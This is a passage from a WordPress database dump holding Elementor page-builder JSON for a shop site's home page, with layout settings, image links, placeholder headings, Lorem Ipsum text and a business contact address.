,\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8218,1449,'_elementor_page_assets','a:0:{}'),(8220,1450,'_elementor_edit_mode','builder'),(8221,1450,'_elementor_template_type','wp-page'),(8222,1450,'_elementor_version','3.7.7'),(8223,1450,'_wp_page_template','elementor_canvas'),(8224,1450,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"224\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"-14\",\"right\":0,\"bottom\":\"-14\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e9c7fcf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"-25\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"1\",\"bottom\":\"42\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e8bbbae\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8225,1450,'_elementor_page_assets','a:0:{}'),(8227,1451,'_elementor_edit_mode','builder'),(8228,1451,'_elementor_template_type','wp-page'),(8229,1451,'_elementor_version','3.7.7'),(8230,1451,'_wp_page_template','elementor_canvas'),(8231,1451,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"224\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"-14\",\"right\":0,\"bottom\":\"-14\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e9c7fcf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"-25\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"1\",\"bottom\":\"42\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e8bbbae\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 